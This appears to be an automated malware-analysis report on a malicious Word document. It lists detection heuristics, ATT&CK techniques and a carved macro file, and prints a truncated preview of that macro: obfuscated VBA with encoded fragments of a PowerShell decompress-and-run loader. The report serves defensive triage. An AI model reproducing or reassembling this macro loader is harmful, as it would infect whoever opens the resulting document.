MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Obfuscate Malicious Files or Information
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses CreateObject, indicating an attempt to execute code. The presence of a 'macros.bas' file and the 'Doc.Malware.Emodldr-10025032-0' ClamAV detection strongly suggest this is a downloader. The VBA script itself appears heavily obfuscated, making it difficult to determine the exact download URL or execution method, but the intent is clearly to fetch and run a secondary payload.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49395 bytes |
SHA-256: ab8a136429fbec0dbfa2dee8add2dca68cae5bc0edca6a8b0827c9f648424d7a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jpWQHEwkup"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JwssZSKpKRRD"
Function bqLiQcBEz()
On Error Resume Next
Select Case hfOUj
Case 14791
iAaGd = 77435
JriNm = Sqr(47354)
Case 63755
tYpAX = CSng(NsilK)
RZnlJY = hbSbr
End Select
nvlLPXVR = kFTrBu("C9BRRrw2n/3sZOatuXWzsZl3xrnZd1O05p0zr8zbPsw3Bz3@", 6, 41)
Select Case MYwtC
Case 46624
jPmqf = 66771
LQHvUT = Sqr(23811)
Case 15173
EtDNMz = CSng(awwvLf)
zcNpv = nzGao
End Select
Select Case SofHpF
Case 93910
bUCOq = 16525
TLBrfa = Sqr(13200)
Case 95393
oJPiPc = CSng(ASBzh)
ENtzYY = kzidJ
End Select
KapEJN = kFTrBu("GIKW+hO7HfHZy6T6Y8s", 5, 10)
Select Case qEMaLL
Case 82746
TfpOow = 98127
woLHj = Sqr(13269)
Case 76991
hBiYzq = CSng(lYjmQo)
qlqlki = jjZZj
End Select
Select Case FRSsMP
Case 46391
FnuIqs = 95905
krqoFE = Sqr(79676)
Case 75599
wTWOZ = CSng(FIkrZ)
tkzmZ = EZKwvN
End Select
KXFozlXOu = kFTrBu("njLmzZuLH6N2Ub3Pl6vVt+ePd+2/D3e3q4dt5Uej53+MRpeTV9n1dZLcXF2Nwt/Vj9Evl6Nn7x7fLuzdh2Ty8dfw/+Zb+H+afvz14u+Lq/8A'), [sYStEM.iO.COmPREssIon.coMPreSTNTVrT", 2, 141)
Select Case iYSuj
Case 2700
fmOvBj = 60850
ozGBY = Sqr(4147)
Case 84178
sBjPl = CSng(uCXIF)
rnODpz = GVClsJ
End Select
Select Case vZcoFo
Case 29319
HUfXb = 24215
WmEtK = Sqr(52477)
Case 87437
zuvdu = CSng(YUmGKi)
ojuuK = cuThCW
End Select
GBvTUdAAkY = kFTrBu("b+Bju6oxzrqg9j/aP9y5HeXjH3HkX2V9osL5hd4j/UgOtGjn4l6D/XT0j+WeqKmXtPvAsBf9uUL6vOGfYLqDq2b8", 2, 82)
Select Case pshwz
Case 45517
TdtJK = 38958
iAtRR = Sqr(57740)
Case 10048
GKwApR = CSng(jNtHs)
fnqJn = zLmkkp
End Select
Select Case JwKvY
Case 1932
JNGjz = 87789
jipzSC = Sqr(20158)
Case 49734
Hbljw = CSng(WKsjG)
lMLjuc = FoEoaj
End Select
YUKiwpW = kFTrBu("vdhsioNmode]::deComPRESs )|&('F'+'oreacH-'+'OBjE'+'ct'){&('New-'+'oBJe'+'CT') ('IO.sT'+'reA'+'MrEAder')($_,[tEXt.enCBIj", 4, 114)
Select Case IuJWi
Case 5714
bDUnRQ = 74669
wnQmww = Sqr(42729)
Case 56351
YajUj = CSng(nKCqO)
AWBDwJ = rvcMn
End Select
Select Case utwEp
Case 86977
wPZGb = 3716
chJslH = Sqr(37047)
Case 71491
DfiVI = CSng(bIqsO)
sRsFG = FTvSDW
End Select
hwARRVS = kFTrBu("J7AtfKA3Mr5Rv5uwXu7hZzsdl/dhXaN+KMXfeh/1q5zn4O/Gy7oO54XxsN9O5lXqnxxxHO7Zir07jQPjvlb/12JPovfqEU/1T1gf1mmccM9a4oD5uq+VuG71PnKPueSf7J+Lv47II8ZN8krzRPyXyz6prNf9JU69jHuxdyfz1hy3nuskb4L9yI9W7Erj", 8, 179)
Select Case NpwNi
Case 20847
JhtZGX = 17368
nRPjnO = Sqr(68294)
Case 29606
mfPNS = CSng(kcMAu)
duMhc = LYTzi
End Select
Select Case nQizNP
Case 6138
QHmccZ = 66271
NiSjit = Sqr(13515)
Case 80146
QJjKX = CSng(NSnkp)
WwFDJz = QiGME
End Select
EpNBAG = kFTrBu("FWR4fRxwS3OF3Bc3LlrjhoJs0n4BnlcaJ+gb1npJXYx8TcWnM7yoH6pgj7UjIZPT,", 4, 59)
Select Case Azmzs
Case 88514
pmzFW = 60826
jYJoot = Sqr(10803)
Case 81991
McZtrY = CSng(JzbtXa)
Vvqjqj = AjdGjr
End Select
Select Case wodaT
Case 18781
BnmfU = 27
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.